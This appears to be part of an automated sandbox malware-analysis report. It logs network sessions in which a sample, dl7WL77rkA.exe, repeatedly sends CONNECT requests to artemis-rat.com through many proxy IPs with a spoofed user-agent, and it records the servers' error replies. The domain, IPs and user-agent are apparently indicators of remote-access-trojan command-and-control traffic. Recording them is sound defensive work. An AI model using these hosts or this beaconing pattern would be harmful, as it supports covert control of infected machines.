                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:24.370995998 CET805INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:18 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 613
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:30.259371996 CET805INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:18 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 613
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:41.779217958 CET805INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:18 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 613
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2041192.168.2.55400972.169.67.109873876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.887171984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.889483929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.966269016 CET766INHTTP/1.0 514 Web Acceleration Client Error (514) - Proxied HTTPS Request Not Supported
                                                                                                                                                                                                                                                            Content-type: text/html
                                                                                                                                                                                                                                                            Content-length: 630
                                                                                                                                                                                                                                                            Data Raw: 3c 54 49 54 4c 45 3e 57 65 62 20 41 63 63 65 6c 65 72 61 74 69 6f 6e 20 43 6c 69 65 6e 74 20 45 72 72 6f 72 20 28 35 31 34 29 20 2d 20 50 72 6f 78 69 65 64 20 48 54 54 50 53 20 52 65 71 75 65 73 74 20 4e 6f 74 20 53 75 70 70 6f 72 74 65 64 3c 2f 54 49 54 4c 45 3e 3c 42 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 61 72 69 61 6c 20 63 6f 6c 6f 72 3d 23 33 36 34 32 61 32 3e 57 65 62 20 41 63 63 65 6c 65 72 61 74 69 6f 6e 20 43 6c 69 65 6e 74 20 45 72 72 6f 72 20 28 35 31 34 29 20 2d 20 50 72 6f 78 69 65 64 20 48 54 54 50 53 20 52 65 71 75 65 73 74 20 4e 6f 74 20 53 75 70 70 6f 72 74 65 64 3c 2f 66 6f 6e 74 3e 3c 2f 42 3e 3c 66 6f 6e 74 20 73 74 79 6c 65 3d 6e 6f 72 6d 61 6c 20 66 61 63 65 3d 61 72 69 61 6c 20 73 69 7a 65 3d 32 70 78 3e 3c 50 3e 54 68 65 20 57 65 62 20 41 63 63 65 6c 65 72 61 74 69 6f 6e 20 43 6c 69 65 6e 74 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 73 65 63 75 72 65 20 72 65 71 75 65 73 74 73 20 28 48 54 54 50 53 29 20 66 72 6f 6d 20 61 20 62 72 6f 77 73 65 72 20 77 68 65 6e 3a 20 3c 50 3e 20 3c 55 4c 3e 3c 4c 49 3e 20 54 68 65 20 62 72 6f 77 73 65 72 20 69 73 20 70 72 6f 78 69 65 64 20 74 6f 20 57 65 62 20 41 63 63 65 6c 65 72 61 74 69 6f 6e 20 43 6c 69 65 6e 74 20 66 6f 72 20 73 65 63 75 72 65 20 72 65 71 75 65 73 74 73 20 28 48 54 54 50 53 29 2c 20 61 6e 64 20 3c 4c 49 3e 20 54 68 65 20 57 65 62 20 41 63 63 65 6c 65 72 61 74 69 6f 6e 20 43 6c 69 65 6e 74 20 69 73 20 6e 6f 74 20 63 6f 6e 66 69 67 75 72 65 64 20 77 69 74 68 20 61 20 70 72 6f 78 79 20 73 65 72 76 65 72 2c 20 61 6e 64 20 3c 4c 49 3e 20 53 53 4c 42 20 69 73 20 64 69 73 61 62 6c 65 64 20 3c 2f 55 4c 3e 3c 50 3e 20 54 6f 20 63 6f 72 72 65 63 74 20 74 68 69 73 20 70 72 6f 62 6c 65 6d 2c 20 79 6f 75 20 6d 75 73 74 20 72 65 6d 6f 76 65 20 74 68 65 20 70 72 6f 78 79 20 73 65 74 74 69 6e 67 73 20 66 72 6f 6d 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 50 3e 3c 2f 66 6f 6e 74 3e
                                                                                                                                                                                                                                                            Data Ascii: <TITLE>Web Acceleration Client Error (514) - Proxied HTTPS Request Not Supported</TITLE><B><font face=arial color=#3642a2>Web Acceleration Client Error (514) - Proxied HTTPS Request Not Supported</font></B><font style=normal face=arial size=2px><P>The Web Acceleration Client does not support secure requests (HTTPS) from a browser when: <P> <UL><LI> The browser is proxied to Web Acceleration Client for secure requests (HTTPS), and <LI> The Web Acceleration Client is not configured with a proxy server, and <LI> SSLB is disabled </UL><P> To correct this problem, you must remove the proxy settings from your browser.</P></font>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2042192.168.2.555457162.214.225.223434353876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.895225048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.486943960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.217840910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.608340979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2043192.168.2.55477972.37.217.341453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.895684004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2044192.168.2.555454211.222.252.18781973876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.895795107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2045192.168.2.55408645.81.232.1747153876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.896028996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.989512920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.014513016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.074440002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2046192.168.2.552222162.241.53.72574953876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.897018909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.989495039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.014504910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.074436903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2047192.168.2.555200162.241.50.179314143876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.908425093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.998567104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.092972040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.092890978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2048192.168.2.555096117.160.250.163803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.908937931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.878261089 CET303INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:48 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.500655890 CET303INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:48 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:02.748056889 CET303INHTTP/1.1 400 Bad Request
